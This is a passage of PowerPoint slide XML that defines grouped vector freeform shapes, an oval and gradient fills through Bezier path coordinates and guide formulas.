                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2C57587-F217-4921-BDBA-8709513B4D9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233" y="1087"/>
                <a:ext cx="52" cy="42"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 66 w 68"/>
                  <a:gd name="T1" fmla="*/ 0 h 55"/>
                  <a:gd name="T2" fmla="*/ 68 w 68"/>
                  <a:gd name="T3" fmla="*/ 3 h 55"/>
                  <a:gd name="T4" fmla="*/ 44 w 68"/>
                  <a:gd name="T5" fmla="*/ 23 h 55"/>
                  <a:gd name="T6" fmla="*/ 25 w 68"/>
                  <a:gd name="T7" fmla="*/ 50 h 55"/>
                  <a:gd name="T8" fmla="*/ 21 w 68"/>
                  <a:gd name="T9" fmla="*/ 52 h 55"/>
                  <a:gd name="T10" fmla="*/ 15 w 68"/>
                  <a:gd name="T11" fmla="*/ 55 h 55"/>
                  <a:gd name="T12" fmla="*/ 12 w 68"/>
                  <a:gd name="T13" fmla="*/ 46 h 55"/>
                  <a:gd name="T14" fmla="*/ 11 w 68"/>
                  <a:gd name="T15" fmla="*/ 43 h 55"/>
                  <a:gd name="T16" fmla="*/ 5 w 68"/>
                  <a:gd name="T17" fmla="*/ 30 h 55"/>
                  <a:gd name="T18" fmla="*/ 0 w 68"/>
                  <a:gd name="T19" fmla="*/ 24 h 55"/>
                  <a:gd name="T20" fmla="*/ 9 w 68"/>
                  <a:gd name="T21" fmla="*/ 21 h 55"/>
                  <a:gd name="T22" fmla="*/ 18 w 68"/>
                  <a:gd name="T23" fmla="*/ 34 h 55"/>
                  <a:gd name="T24" fmla="*/ 19 w 68"/>
                  <a:gd name="T25" fmla="*/ 38 h 55"/>
                  <a:gd name="T26" fmla="*/ 41 w 68"/>
                  <a:gd name="T27" fmla="*/ 15 h 55"/>
                  <a:gd name="T28" fmla="*/ 66 w 68"/>
                  <a:gd name="T2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8" h="55">
                    <a:moveTo>
                      <a:pt x="66" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="3"/>
                      <a:pt x="68" y="3"/>
                      <a:pt x="68" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="61" y="7"/>
                      <a:pt x="53" y="14"/>
                      <a:pt x="44" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="32"/>
                      <a:pt x="29" y="41"/>
                      <a:pt x="25" y="50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18" y="53"/>
                      <a:pt x="16" y="54"/>
                      <a:pt x="15" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="53"/>
                      <a:pt x="13" y="51"/>
                      <a:pt x="12" y="46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9" y="37"/>
                      <a:pt x="7" y="33"/>
                      <a:pt x="5" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="28"/>
                      <a:pt x="2" y="26"/>
                      <a:pt x="0" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="22"/>
                      <a:pt x="7" y="20"/>
                      <a:pt x="9" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="22"/>
                      <a:pt x="15" y="26"/>
                      <a:pt x="18" y="34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5" y="30"/>
                      <a:pt x="32" y="22"/>
                      <a:pt x="41" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="8"/>
                      <a:pt x="58" y="3"/>
                      <a:pt x="66" y="0"/>
                    </a:cubicBezTo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645" name="Freeform 1152">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA481119-4113-4A46-AC66-DDB88610E175}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="7344827" y="5124393"/>
              <a:ext cx="1519434" cy="406991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646" name="Group 1250">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2783B04-F662-4C0D-B1E8-464F9A0539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38209" y="4988729"/>
              <a:ext cx="506085" cy="386937"/>
              <a:chOff x="2724" y="1560"/>
              <a:chExt cx="429" cy="328"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="963" name="Group 1249">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B36E768A-549F-4B70-AB78-1D3F4D2373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53" y="1560"/>
                <a:ext cx="155" cy="263"/>
                <a:chOff x="2953" y="1560"/>
                <a:chExt cx="155" cy="263"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="986" name="Freeform 1155">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F18A3D89-5F65-4B5A-A366-8EF4F7F634BF}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2953" y="1603"/>
                  <a:ext cx="155" cy="121"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 235 w 237"/>
                    <a:gd name="T1" fmla="*/ 113 h 186"/>
                    <a:gd name="T2" fmla="*/ 235 w 237"/>
                    <a:gd name="T3" fmla="*/ 113 h 186"/>
                    <a:gd name="T4" fmla="*/ 225 w 237"/>
                    <a:gd name="T5" fmla="*/ 49 h 186"/>
                    <a:gd name="T6" fmla="*/ 199 w 237"/>
                    <a:gd name="T7" fmla="*/ 24 h 186"/>
                    <a:gd name="T8" fmla="*/ 156 w 237"/>
                    <a:gd name="T9" fmla="*/ 12 h 186"/>
                    <a:gd name="T10" fmla="*/ 116 w 237"/>
                    <a:gd name="T11" fmla="*/ 2 h 186"/>
                    <a:gd name="T12" fmla="*/ 87 w 237"/>
                    <a:gd name="T13" fmla="*/ 12 h 186"/>
                    <a:gd name="T14" fmla="*/ 73 w 237"/>
                    <a:gd name="T15" fmla="*/ 85 h 186"/>
                    <a:gd name="T16" fmla="*/ 73 w 237"/>
                    <a:gd name="T17" fmla="*/ 85 h 186"/>
                    <a:gd name="T18" fmla="*/ 72 w 237"/>
                    <a:gd name="T19" fmla="*/ 90 h 186"/>
                    <a:gd name="T20" fmla="*/ 21 w 237"/>
                    <a:gd name="T21" fmla="*/ 104 h 186"/>
                    <a:gd name="T22" fmla="*/ 26 w 237"/>
                    <a:gd name="T23" fmla="*/ 135 h 186"/>
                    <a:gd name="T24" fmla="*/ 80 w 237"/>
                    <a:gd name="T25" fmla="*/ 122 h 186"/>
                    <a:gd name="T26" fmla="*/ 80 w 237"/>
                    <a:gd name="T27" fmla="*/ 122 h 186"/>
                    <a:gd name="T28" fmla="*/ 86 w 237"/>
                    <a:gd name="T29" fmla="*/ 120 h 186"/>
                    <a:gd name="T30" fmla="*/ 99 w 237"/>
                    <a:gd name="T31" fmla="*/ 112 h 186"/>
                    <a:gd name="T32" fmla="*/ 104 w 237"/>
                    <a:gd name="T33" fmla="*/ 92 h 186"/>
                    <a:gd name="T34" fmla="*/ 104 w 237"/>
                    <a:gd name="T35" fmla="*/ 92 h 186"/>
                    <a:gd name="T36" fmla="*/ 110 w 237"/>
                    <a:gd name="T37" fmla="*/ 47 h 186"/>
                    <a:gd name="T38" fmla="*/ 109 w 237"/>
                    <a:gd name="T39" fmla="*/ 160 h 186"/>
                    <a:gd name="T40" fmla="*/ 119 w 237"/>
                    <a:gd name="T41" fmla="*/ 170 h 186"/>
                    <a:gd name="T42" fmla="*/ 169 w 237"/>
                    <a:gd name="T43" fmla="*/ 184 h 186"/>
                    <a:gd name="T44" fmla="*/ 196 w 237"/>
                    <a:gd name="T45" fmla="*/ 165 h 186"/>
                    <a:gd name="T46" fmla="*/ 196 w 237"/>
                    <a:gd name="T47" fmla="*/ 160 h 186"/>
                    <a:gd name="T48" fmla="*/ 216 w 237"/>
                    <a:gd name="T49" fmla="*/ 155 h 186"/>
                    <a:gd name="T50" fmla="*/ 219 w 237"/>
                    <a:gd name="T51" fmla="*/ 154 h 186"/>
                    <a:gd name="T52" fmla="*/ 232 w 237"/>
                    <a:gd name="T53" fmla="*/ 146 h 186"/>
                    <a:gd name="T54" fmla="*/ 237 w 237"/>
                    <a:gd name="T55" fmla="*/ 124 h 186"/>
                    <a:gd name="T56" fmla="*/ 235 w 237"/>
                    <a:gd name="T57" fmla="*/ 113 h 186"/>
                    <a:gd name="T58" fmla="*/ 193 w 237"/>
                    <a:gd name="T59" fmla="*/ 75 h 186"/>
                    <a:gd name="T60" fmla="*/ 194 w 237"/>
                    <a:gd name="T61" fmla="*/ 87 h 186"/>
                    <a:gd name="T62" fmla="*/ 200 w 237"/>
                    <a:gd name="T63" fmla="*/ 123 h 186"/>
                    <a:gd name="T64" fmla="*/ 196 w 237"/>
                    <a:gd name="T65" fmla="*/ 124 h 186"/>
                    <a:gd name="T66" fmla="*/ 194 w 237"/>
                    <a:gd name="T67" fmla="*/ 87 h 186"/>
                    <a:gd name="T68" fmla="*/ 193 w 237"/>
                    <a:gd name="T69" fmla="*/ 75 h 186"/>
                    <a:gd name="T70" fmla="*/ 192 w 237"/>
                    <a:gd name="T71" fmla="*/ 70 h 186"/>
                    <a:gd name="T72" fmla="*/ 193 w 237"/>
                    <a:gd name="T73" fmla="*/ 75 h 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7" h="186">
                      <a:moveTo>
                        <a:pt x="235" y="113"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="235" y="113"/>
                        <a:pt x="235" y="113"/>
                        <a:pt x="235" y="113"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="230" y="84"/>
                        <a:pt x="226" y="57"/>
                        <a:pt x="225" y="49"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="223" y="32"/>
                        <a:pt x="207" y="26"/>
                        <a:pt x="199" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="192" y="21"/>
                        <a:pt x="169" y="16"/>
                        <a:pt x="156" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="9"/>
                        <a:pt x="125" y="3"/>
                        <a:pt x="116" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="107" y="0"/>
                        <a:pt x="90" y="4"/>
                        <a:pt x="87" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="86" y="14"/>
                        <a:pt x="79" y="50"/>
                        <a:pt x="73" y="85"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="73" y="85"/>
                        <a:pt x="73" y="85"/>
                        <a:pt x="73" y="85"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="72" y="90"/>
                        <a:pt x="72" y="90"/>
                        <a:pt x="72" y="90"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="49" y="96"/>
                        <a:pt x="29" y="102"/>
                        <a:pt x="21" y="104"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="108"/>
                        <a:pt x="9" y="137"/>
                        <a:pt x="26" y="135"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="31" y="135"/>
                        <a:pt x="55" y="129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6" y="120"/>
                        <a:pt x="86" y="120"/>
                        <a:pt x="86" y="120"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="92" y="118"/>
                        <a:pt x="96" y="116"/>
                        <a:pt x="99" y="112"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="102" y="108"/>
                        <a:pt x="104" y="102"/>
                        <a:pt x="104" y="92"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="104" y="92"/>
                        <a:pt x="104" y="92"/>
                        <a:pt x="104" y="92"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="65"/>
                        <a:pt x="111" y="43"/>
                        <a:pt x="110" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="110" y="53"/>
                        <a:pt x="109" y="117"/>
                        <a:pt x="109" y="160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="110" y="165"/>
                        <a:pt x="112" y="170"/>
                        <a:pt x="119" y="170"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="131" y="173"/>
                        <a:pt x="162" y="183"/>
                        <a:pt x="169" y="184"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="178" y="186"/>
                        <a:pt x="193" y="176"/>
                        <a:pt x="196" y="165"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="163"/>
                        <a:pt x="196" y="162"/>
                        <a:pt x="196" y="160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="202" y="158"/>
                        <a:pt x="209" y="157"/>
                        <a:pt x="216" y="155"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="217" y="154"/>
                        <a:pt x="218" y="154"/>
                        <a:pt x="219" y="154"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="225" y="152"/>
                        <a:pt x="229" y="150"/>
                        <a:pt x="232" y="146"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="235" y="141"/>
                        <a:pt x="237" y="135"/>
                        <a:pt x="237" y="124"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="235" y="113"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="193" y="75"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="194" y="79"/>
                        <a:pt x="194" y="83"/>
                        <a:pt x="194" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="96"/>
                        <a:pt x="198" y="108"/>
                        <a:pt x="200" y="123"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="199" y="123"/>
                        <a:pt x="197" y="123"/>
                        <a:pt x="196" y="124"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="111"/>
                        <a:pt x="195" y="99"/>
                        <a:pt x="194" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="194" y="82"/>
                        <a:pt x="193" y="78"/>
                        <a:pt x="193" y="75"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="192" y="73"/>
                        <a:pt x="192" y="72"/>
                        <a:pt x="192" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="192" y="72"/>
                        <a:pt x="193" y="73"/>
                        <a:pt x="193" y="7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50000">
                      <a:srgbClr val="FFFFFF">
                        <a:gamma/>
                        <a:shade val="85882"/>
                        <a:invGamma/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="FFFFFF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1156">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6AEC336-B358-4771-9C3A-1DDD3AD67E5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30" y="1595"/>
                  <a:ext cx="43" cy="27"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 30 w 66"/>
                    <a:gd name="T1" fmla="*/ 39 h 41"/>
                    <a:gd name="T2" fmla="*/ 10 w 66"/>
                    <a:gd name="T3" fmla="*/ 23 h 41"/>
                    <a:gd name="T4" fmla="*/ 16 w 66"/>
                    <a:gd name="T5" fmla="*/ 13 h 41"/>
                    <a:gd name="T6" fmla="*/ 54 w 66"/>
                    <a:gd name="T7" fmla="*/ 16 h 41"/>
                    <a:gd name="T8" fmla="*/ 57 w 66"/>
                    <a:gd name="T9" fmla="*/ 29 h 41"/>
                    <a:gd name="T10" fmla="*/ 30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5"/>
                        <a:pt x="16" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19" y="10"/>
                        <a:pt x="54" y="0"/>
                        <a:pt x="54" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="21"/>
                        <a:pt x="48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8" name="Freeform 1157">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4333D3CF-1853-4373-A755-F9C55EFFDBD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977" y="1706"/>
                  <a:ext cx="104" cy="117"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 159 w 159"/>
                    <a:gd name="T1" fmla="*/ 6 h 180"/>
                    <a:gd name="T2" fmla="*/ 132 w 159"/>
                    <a:gd name="T3" fmla="*/ 21 h 180"/>
                    <a:gd name="T4" fmla="*/ 81 w 159"/>
                    <a:gd name="T5" fmla="*/ 11 h 180"/>
                    <a:gd name="T6" fmla="*/ 72 w 159"/>
                    <a:gd name="T7" fmla="*/ 0 h 180"/>
                    <a:gd name="T8" fmla="*/ 68 w 159"/>
                    <a:gd name="T9" fmla="*/ 19 h 180"/>
                    <a:gd name="T10" fmla="*/ 17 w 159"/>
                    <a:gd name="T11" fmla="*/ 32 h 180"/>
                    <a:gd name="T12" fmla="*/ 1 w 159"/>
                    <a:gd name="T13" fmla="*/ 55 h 180"/>
                    <a:gd name="T14" fmla="*/ 1 w 159"/>
                    <a:gd name="T15" fmla="*/ 145 h 180"/>
                    <a:gd name="T16" fmla="*/ 36 w 159"/>
                    <a:gd name="T17" fmla="*/ 156 h 180"/>
                    <a:gd name="T18" fmla="*/ 43 w 159"/>
                    <a:gd name="T19" fmla="*/ 145 h 180"/>
                    <a:gd name="T20" fmla="*/ 42 w 159"/>
                    <a:gd name="T21" fmla="*/ 73 h 180"/>
                    <a:gd name="T22" fmla="*/ 42 w 159"/>
                    <a:gd name="T23" fmla="*/ 73 h 180"/>
                    <a:gd name="T24" fmla="*/ 42 w 159"/>
                    <a:gd name="T25" fmla="*/ 72 h 180"/>
                    <a:gd name="T26" fmla="*/ 42 w 159"/>
                    <a:gd name="T27" fmla="*/ 66 h 180"/>
                    <a:gd name="T28" fmla="*/ 42 w 159"/>
                    <a:gd name="T29" fmla="*/ 64 h 180"/>
                    <a:gd name="T30" fmla="*/ 42 w 159"/>
                    <a:gd name="T31" fmla="*/ 63 h 180"/>
                    <a:gd name="T32" fmla="*/ 59 w 159"/>
                    <a:gd name="T33" fmla="*/ 41 h 180"/>
                    <a:gd name="T34" fmla="*/ 103 w 159"/>
                    <a:gd name="T35" fmla="*/ 30 h 180"/>
                    <a:gd name="T36" fmla="*/ 103 w 159"/>
                    <a:gd name="T37" fmla="*/ 30 h 180"/>
                    <a:gd name="T38" fmla="*/ 59 w 159"/>
                    <a:gd name="T39" fmla="*/ 41 h 180"/>
                    <a:gd name="T40" fmla="*/ 42 w 159"/>
                    <a:gd name="T41" fmla="*/ 63 h 180"/>
                    <a:gd name="T42" fmla="*/ 42 w 159"/>
                    <a:gd name="T43" fmla="*/ 71 h 180"/>
                    <a:gd name="T44" fmla="*/ 42 w 159"/>
                    <a:gd name="T45" fmla="*/ 72 h 180"/>
                    <a:gd name="T46" fmla="*/ 42 w 159"/>
                    <a:gd name="T47" fmla="*/ 77 h 180"/>
                    <a:gd name="T48" fmla="*/ 42 w 159"/>
                    <a:gd name="T49" fmla="*/ 77 h 180"/>
                    <a:gd name="T50" fmla="*/ 43 w 159"/>
                    <a:gd name="T51" fmla="*/ 154 h 180"/>
                    <a:gd name="T52" fmla="*/ 43 w 159"/>
                    <a:gd name="T53" fmla="*/ 154 h 180"/>
                    <a:gd name="T54" fmla="*/ 43 w 159"/>
                    <a:gd name="T55" fmla="*/ 157 h 180"/>
                    <a:gd name="T56" fmla="*/ 84 w 159"/>
                    <a:gd name="T57" fmla="*/ 157 h 180"/>
                    <a:gd name="T58" fmla="*/ 85 w 159"/>
                    <a:gd name="T59" fmla="*/ 77 h 180"/>
                    <a:gd name="T60" fmla="*/ 89 w 159"/>
                    <a:gd name="T61" fmla="*/ 69 h 180"/>
                    <a:gd name="T62" fmla="*/ 141 w 159"/>
                    <a:gd name="T63" fmla="*/ 55 h 180"/>
                    <a:gd name="T64" fmla="*/ 159 w 159"/>
                    <a:gd name="T65" fmla="*/ 25 h 180"/>
                    <a:gd name="T66" fmla="*/ 159 w 159"/>
                    <a:gd name="T67" fmla="*/ 8 h 180"/>
                    <a:gd name="T68" fmla="*/ 159 w 159"/>
                    <a:gd name="T69" fmla="*/ 6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9" h="180">
                      <a:moveTo>
                        <a:pt x="159" y="6"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="156" y="17"/>
                        <a:pt x="140" y="23"/>
                        <a:pt x="132" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="124" y="20"/>
                        <a:pt x="94" y="14"/>
                        <a:pt x="81" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="75" y="10"/>
                        <a:pt x="73" y="5"/>
                        <a:pt x="72" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="72" y="19"/>
                        <a:pt x="72" y="18"/>
                        <a:pt x="68" y="19"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="68" y="19"/>
                        <a:pt x="28" y="28"/>
                        <a:pt x="17" y="32"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="36"/>
                        <a:pt x="2" y="42"/>
                        <a:pt x="1" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="55"/>
                        <a:pt x="0" y="135"/>
                        <a:pt x="1" y="145"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="163"/>
                        <a:pt x="25" y="165"/>
                        <a:pt x="36" y="156"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="39" y="153"/>
                        <a:pt x="43" y="149"/>
                        <a:pt x="43" y="145"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="130"/>
                        <a:pt x="42" y="102"/>
                        <a:pt x="42" y="73"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="73"/>
                        <a:pt x="42" y="73"/>
                        <a:pt x="42" y="73"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="73"/>
                        <a:pt x="42" y="72"/>
                        <a:pt x="42" y="72"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="70"/>
                        <a:pt x="42" y="68"/>
                        <a:pt x="42" y="66"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="65"/>
                        <a:pt x="42" y="65"/>
                        <a:pt x="42" y="64"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="64"/>
                        <a:pt x="42" y="63"/>
                        <a:pt x="42" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="50"/>
                        <a:pt x="48" y="44"/>
                        <a:pt x="59" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="68" y="37"/>
                        <a:pt x="101" y="30"/>
                        <a:pt x="103" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="107" y="28"/>
                        <a:pt x="107" y="28"/>
                        <a:pt x="103" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="101" y="30"/>
                        <a:pt x="68" y="37"/>
                        <a:pt x="59" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="48" y="44"/>
                        <a:pt x="43" y="50"/>
                        <a:pt x="42" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="64"/>
                        <a:pt x="42" y="70"/>
                        <a:pt x="42" y="71"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="71"/>
                        <a:pt x="42" y="71"/>
                        <a:pt x="42" y="72"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="72"/>
                        <a:pt x="42" y="74"/>
                        <a:pt x="42" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="77"/>
                        <a:pt x="42" y="77"/>
                        <a:pt x="42" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="154"/>
                        <a:pt x="43" y="154"/>
                        <a:pt x="43" y="154"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="154"/>
                        <a:pt x="43" y="154"/>
                        <a:pt x="43" y="154"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="155"/>
                        <a:pt x="43" y="156"/>
                        <a:pt x="43" y="157"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="180"/>
                        <a:pt x="84" y="177"/>
                        <a:pt x="84" y="157"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="84" y="142"/>
                        <a:pt x="85" y="80"/>
                        <a:pt x="85" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="85" y="74"/>
                        <a:pt x="87" y="70"/>
                        <a:pt x="89" y="69"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="91" y="69"/>
                        <a:pt x="136" y="57"/>
                        <a:pt x="141" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="153" y="52"/>
                        <a:pt x="159" y="47"/>
                        <a:pt x="159" y="25"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="159" y="8"/>
                        <a:pt x="159" y="8"/>
                        <a:pt x="159" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="159" y="7"/>
                        <a:pt x="159" y="7"/>
                        <a:pt x="159" y="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4074"/>
                    </a:gs>
                    <a:gs pos="50000">
                      <a:srgbClr val="004074">
                        <a:gamma/>
                        <a:shade val="85882"/>
                        <a:invGamma/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="004074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9" name="Oval 1158">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EB3DA4D-8523-4A1D-BA79-9D21CF50EE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flipH="1">
                  <a:off x="3025" y="1560"/>
                  <a:ext cx="52" cy="52"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF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90" name="Freeform 1159">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3160B1F4-6B1D-4E7F-8816-AE2475CDD4B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38" y="1626"/>
                  <a:ext cx="16" cy="76"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 55"/>
                    <a:gd name="T1" fmla="*/ 0 h 265"/>
                    <a:gd name="T2" fmla="*/ 14 w 55"/>
                    <a:gd name="T3" fmla="*/ 22 h 265"/>
                    <a:gd name="T4" fmla="*/ 5 w 55"/>
                    <a:gd name="T5" fmla="*/ 239 h 265"/>
                    <a:gd name="T6" fmla="*/ 29 w 55"/>
                    <a:gd name="T7" fmla="*/ 265 h 265"/>
                    <a:gd name="T8" fmla="*/ 52 w 55"/>
                    <a:gd name="T9" fmla="*/ 253 h 265"/>
                    <a:gd name="T10" fmla="*/ 38 w 55"/>
                    <a:gd name="T11" fmla="*/ 29 h 265"/>
                    <a:gd name="T12" fmla="*/ 55 w 55"/>
                    <a:gd name="T13" fmla="*/ 15 h 265"/>
                    <a:gd name="T14" fmla="*/ 0 w 55"/>
                    <a:gd name="T15" fmla="*/ 0 h 2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5" h="265">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="14" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="239"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="29" y="265"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="52" y="253"/>
